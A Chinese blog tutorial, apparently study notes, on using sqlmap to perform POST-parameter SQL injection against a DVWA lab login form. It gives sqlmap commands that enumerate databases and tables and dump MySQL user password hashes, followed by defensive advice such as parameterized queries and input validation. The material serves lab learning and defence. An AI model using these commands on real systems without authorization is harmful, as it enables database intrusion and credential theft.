利用sqlmap进行post注入学习笔记

最新推荐文章于 2025-04-09 11:36:13 发布
最新推荐文章于 2025-04-09 11:36:13 发布
阅读量3.2k 收藏 10
点赞数 2
CC 4.0 BY-SA版权
分类专栏: 网络安全 文章标签: 网络安全 mysql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52034407/article/details/129653842
文章介绍了SQL注入工具sqlmap的使用,包括通过POST请求进行注入的步骤,以及如何防止POST注入。防御策略包括权限区分、使用参数化语句、输入验证和利用数据库自带的安全参数等。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

了解sqlmap

sqlmap是一款开源、功能强大的自动化SQL注入工具,支持Access,MySQL,Oracle,SQL Server,DB2等多种数据库。支持get,post ,cookie注入,支持基于布尔的盲注,基于时间的盲注,错误回显注入,联合查询注入,堆查询注入等。

POST注入形成原因

1.在登录处,用于判断用户名、密码会使用select语句;

2.在修改密码处,更新密码,会使用到update语句;

3.在商城系统中,订单的添加,删除,可能会使用到insert,delete语句;

登录是执行POST请求,与GET请求不同,传给服务器的值不会再URL中出现了,而是在请求体里,当服务器拿到请求体的数据,再执行SQL语句,查询是否存在用户输入的用户名和密码。

传入参数,服务器解析参数之后,完整闭合SQL语句,构造万能密码成功登陆。

POST注入也属于SQL注入,所以究其原因还是由于参数没有过滤导致的。源码如下:

使用sqlmap进行POST注入

进入DVWA,选择Brute Force选项,username和password随便输入,然后打开burpsuite,设置好本地代理,进行抓包。

将抓到的包保存为1.txt,并放到c盘根目录下。

打开sqlmap。第一步:列出数据库:

sqlmap.py -r c:\1.txt -p username --dbs

-r表示加载一个文件,-p指定参数

第二步:猜表:选择一个数据库进行猜表:

sqlmap.py -r c:\1.txt-p username -D mysql --tables

-D表示数据库;-T表示表;-C表示列

第三步:猜列:

sqlmap.py -r c:\1.txt-p username -D mysql -T user--columns

第四步:得到数据:

sqlmap.py -r c:\1.txt -p username -D mysql -T user -C“User,Password” --dump

此时就得到了root用户的密码哈希值,接下来解密就行。

如何防止POST注入?

权限区分:

普通用户与系统管理员用户的权限要有严格的区分。由于Drop 语句关系到数据库的基本对象,故要操作这个语句用户必须有相关的权限。在权限设计中,对于终端用户,即应用软件的使用者,没有必要给他们数据库对象的建立、删除等权限。那么即使在他们使用 SQL 语句中带有嵌入式的恶意代码,由于其用户权限的限制,这些代码也将无法被执行。故应用程序在设计的时候,最好把系统管理员的用户与普通用户区分开来。如此可以最大限度的减少注入式攻击对数据库带来的危害。

使用参数化语句:

如果在编写 SQL 语句的时候,用户输入的变量不是直接嵌入到 SQL 语句,而是通过参数来传递这个变量的话,那么就可以有效的防治 SQL 注入式攻击。也就是说,用户的输入绝对不能够直接被嵌入到 SQL 语句中。与此相反,用户的输入的内容必须进行过滤,或者使用参数化的语句来传递用户输入的变量。参数化的语句使用参数而不是将用户输入变量嵌入到 SQL 语句中。采用这种措施,可以杜绝大部分的 SQL 注入式攻击。

对用户的输入进行验证:

通过测试类型、长度、格式和范围来验证用户输入,过滤用户输入的内容。这是防止 SQL 注入式攻击的常见并且行之有效的措施。防治 SQL 注入式攻击可以采用两种方法,一是加强对用户输入内容的检查与验证;二是强迫使用参数化语句来传递用户输入的内容。在 SQLServer 数据库中,有比较多的用户输入内容验证工具,可以帮助管理员来对付SQL 注入式攻击。测试字符串变量的内容,只接受所需的值。拒绝包含二进制数据、转义序列和注释字符的输入内容。这有助于防止脚本注入,防止某些缓冲区溢出攻击。测试用户输入内容的大小和数据类型,强制执行适当的限制与转换。这即有助于防止有意造成的缓冲区溢出,对于防治注入式攻击有比较明显的效果。

多使用数据库自带的安全参数:

为了减少注入式攻击对于 SQLServer 数据库的不良影响,在 SQLServer 数据库专门设计了相对安全的 SQL 参数。在数据库设计过程中,工程师要尽量采用这些参数来杜绝恶意的 SQL 注入式攻击。如在 SQL Server 数据库中提供了 Parameters 集合。这个集合提供了类型检查和长度验证的功能。如果管理员采用了 Parameters 这个集合的话,则用户输入的内容将被视为字符值而不是可执行代码。即使用户输入的内容中含有可执行代码,则数据库也会过滤掉。因为此时数据库只把它当作普通的字符来处理。

多层环境防止 SQL 注入:

在多层应用环境中,用户输入的所有数据都应该在验证之后才能被允许进入到可信区域。未通过验证过程的数据应被数据库拒绝,并向上一层返回一个错误信息。实现多层验证。对无目的的恶意用户采取的预防措施,对坚定的攻击者可能无效。

设置陷阱账号:

设置两个帐号,一个是普通管理员帐号,一个是防注入的帐号。将防注入的账号设置的很象管理员,如 admin,以制造假象吸引软件的检测,而密码是大于千字以上的中文字符,迫使软件分析账号的时候进入全负荷状态甚至资源耗尽而死机。

利用sqlmap进行POST注入
ChuMeng1999的博客
01-19 1万+
目录预备知识了解SqlmapPOST注入形成的原因实验目的实验环境实验步骤一使用sqlmap进行POST注入实验步骤二 预备知识 了解Sqlmap sqlmap是一款开源、功能强大的自动化SQL注入工具,支持Access,MySQL,Oracle,SQL Server,DB2等多种数据库。支持get,post,cookie注入,支持基于布尔的盲注,基于时间的盲注,错误回显注入,联合查询注入,堆查询注入等。 POST注入形成的原因 POST注入也属于SQL注入,所以究其原因还是由于参数没有过滤导致的。源码如下
SQL注入工具Sqlmap
weixin_54799594的博客
07-05 1150
学习sql注入过程中的一些小笔记
sqlmap使用之-post注入、head注入(ua、cookie、referer)
weixin_51520483的博客
07-11 1467
bp抓包获取post数据将数据保存到post.txt文件加上-r指定数据文件。
利用sqlmap进行post注入(实操)
peanut5036的博客
12-23 4190
SQL注入攻击指的是通过特殊的输入作为参数拆入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句中进而执行攻击者所要的操作,起主要原因是程序没有细致地过滤用户输入的数据,致使非法数据入侵系统。 任何一个用户可以输入的位置都可能是注入点。比如url中,以及http报文中,POST传递的参数
Sqlmap -- POST注入
Web安全工具库
07-07 3382
想归想,难过归难过,若你岁岁平安,我可生生不见。。。 ---- 网易云热评 一、检测是否存在注入 1、通过BurpSuite抓包获取提交的数据 2、sqlmap -u "http://192.168.139.129/pikachu/vul/sqli/sqli_id.php" --data "id=1&submit=%E6%9F%A5%E8%AF%A2" --data指定提交的数据 运行结果:id值存在注入,可能是布尔盲注、报错注入、时间盲注、联合注入 [14:37:09]...
关于SQLMAP所有参数的学习笔记
热门推荐
Mi1k7ea
02-27 2万+
本文是对于学习SQLMAP参数的使用的一些笔记,不足之处很多会慢慢改进~ SQLMAP是一款开源的、用于SQL注入漏洞检测及利用的工具,它会检测动态页面中get/post参数、cookie、http头,进行数据榨取、文件系统访问和操作系统命令执行,另外还可以进行Xss漏洞检测。关于其更多的描述这里就不多说了,直接入正题,下面从参数的每个大部分的分类开始讲。 在Kali中已默认安装,其他Li
sqlmap学习笔记
Zasen_的博客
06-05 629
ps:学习sqlmap前,建议了解SQL注入实现原理与基本的手工注入操作,更易于理解sqlmap的使用。 sqlmap简介 sqlmap支持五种不同的注入模式: 1.基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2.基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3.基于报错注入,即页面会返回错误信息,或者把注入的...
Kali linux 学习笔记(五十一)Web渗透——sqlmap自动注入 2020.3.28
闵行小鱼塘
03-28 3341
学习sqlmap自动注入
sqlmap基础学习(笔记)
部分学习记录
07-30 1474
此文为自己学习sqlmap基础的笔记,留个痕迹,便于以后复习查询 #sqlmap获取目标 python sqlmap --version python sqlmap -h python sqlmap -hh #sqlmap直连数据库 ##服务型数据库(MySQL、Oracle、Microsoft SQL Server、PostqreSQL etc) DBMS://USER:PASSWORD@DBMS_IP/PORT/DATABASE_NAME 例如:python sqlmap.py -d “mysql://
渗透测试:详解sqlmap进行POST注入、基于insert的注入(以vulnhub靶机LampSecurity:CTF7为例)
Bossfrank的博客
06-22 5535
本文以vulnhub靶机LampSecurity:CTF7为例,详解了insert(非select)类型的SQL注入方法,包含对报错注入函数updatexml的使用。同时还详解了使用sqlmap进行POST类型注入的方法。
sqlmapPOST注入
欢迎光临
10-22 1252
强烈介意用文件导入来进行注入 用表单注入失败率很高!!   来看这题http://123.206.87.240:8002/chengjidan/index.php   明显是POST注入 利用sqlmap吧,网上都是用手工注入,我就用sqlmap来试试 先用Burp抓包保存为txt文件 如何用sqlmap sqlmap.py -r "D:/test.txt" -p -id -...
sqlmap的使用之post
最新发布
2402_88765125的博客
04-09 1318
如需进一步优化(如绕过WAF),可添加 --tamper 脚本(如 space2hash.py )。- 参数冲突:若不同方法结果不一致,优先使用BurpSuite抓包(方法2)确保准确性。- 高级参数:可结合 --cookie 、 --proxy 等应对复杂场景。--level/--risk :提高检测深度和风险等级以覆盖更多场景。--data :POST请求体,需替换为实际参数名和测试值。--forms :自动识别并测试表单字段。-p :指定测试的参数名(可选)。--batch :跳过交互提示。
sqlmappost注入
Galaxy_fan的博客
08-22 712
数据库 python sqlmap.py -r D:\GXY\python\sqlmap\test.txt --dbs 表 python sqlmap.py -r D:\GXY\python\sqlmap\test.txt --tables 数据 (users:表名) python sqlmap.py -r D:\GXY\python\sqlmap\test.txt -T users ...
sqlmap post注入
zhaozhanyong的专栏
11-19 6152
0x00 常用的 注入点:http://tetasp.vulnweb.com/Login.asp 几种注入方式: sqlmap -r search-test.txt -p tfUPass 其中search-test.txt的内容为以下所抓的post包 0x01 常参数的 sqlmap -r search-test.txt -p tfUPss 0x02 常参数的 sql
sqlmap使用教程(包含POST注入方式)
weixin_73904941的博客
10-25 9689
检测注入点以及可注入类型 sqlmap -u "网址" --batch -–batch(不再询问,默认执行) 查看所有数据库 --dbs sqlmap -u "网址" --batch --dbs 查看当前使用的数据库 --current-db sqlmap -u "网址" --batch --current-db 查看表名 sqlmap -u "网址" -D security --tables --batch -D 指定数据库 --tables 列举所有表名 ....
sqlmappost注入
墨渊的博客
09-29 251
调为low级 点击cope to file 把数据数据请求保存到txt -r 使用文件要先使用文件的路径 -r表示加载一个文件 --batch 表示自动输入参数 --dbs表示数据库 sqlmap -r 22.txt --batch --dbs -D 表示选择数据库 --tables表示数据库 sqlmap -r 22.txt --batch -D dvwa --tables -D -T 指定数据库查看的表 ----columns查看表的字段 –dump进行解密 ...
mysql post 注入工具_Sqlmap POST注入 三种方法(转载)
weixin_39778582的博客
01-19 1216
不管怎么说?使用工具Sqlmap POST注入都会简单很多,具体说说Sqlmap POST注入 三种方法吧!一、自动填写表单自动填写表单是Sqlmap工具POST注入的第一种方法,具体步骤如下:1、判断是否有post注入?root@Kali:~# sqlmap -u http://vip.fj0730.cn/login.asp --forms出来的提示,一路回车就可以了!结果如下图:从这里,可以得...
【CTF】sqlmapPOST注入的两种方法(-r 和--data)
HAPPY
07-30 8439
sqlmap进行做post注入测试的时候,发现这么一种情况: 对POST请求,之前一直用 “-r txt文件”的形式,进行注入测试; 发现还有另一种POST,用“-r txt文件”的形式进行却无效,原来可以通过“--data="key=value"”来进行测试注入。   故以上两种情况都是post的,却还是有区别的   故此记录如下: 1:POST注入时,什么时候用“-r txt文...
利用sqlmap扫描POST注入
12-31
### 使用 sqlmap 工具进行 POST 注入漏洞扫描 为了使用 `sqlmap` 对基于 POST 请求的应用程序进行 SQL 注入测试,可以通过指定请求文件的方式来实现。具体操作方法如下: 对于需要通过 POST 方法提交表单数据的情况,先准备好包含 HTTP 请求头以及 POST 数据的文本文件(例如命名为 `request.txt`),该文件的内容应模拟浏览器发送给服务器的实际请求。 假设有一个登录页面接受两个字段:“username” 和 “password”。那么准备好的 `request.txt` 文件可能看起来像这样[^5]: ``` POST /login.php HTTP/1.1 Host: example.com Content-Type: application/x-www-form-urlencoded Content-Length: 32 username=test&password=test ``` 接着运行带有 `-r` 参数的命令来加载这个保存了完整HTTP请求的消息体文件,并让 `sqlmap` 自动检测是否存在SQL注入的可能性并尝试进一步利用它。完整的命令行指令可能是这样的: ```bash sqlmap -r request.txt --batch ``` 如果希望更精确地控制哪些部分作为潜在可注入点,则可以在上述基础上增加额外选项如 `--data` 来显式指明要测试的具体参数[^1]。 另外,在某些情况下还需要提供认证凭证以便能够访问受保护资源。这时可以借助于 `--auth-cred` 及其他相关联的身份验证配置项完成身份验证过程[^3]。 最后提醒一点,执行任何类型的渗透测试之前都应当获得目标系统的合法授权许可,非法入侵他人计算机信息系统属于违法行为!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

夜之王。

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值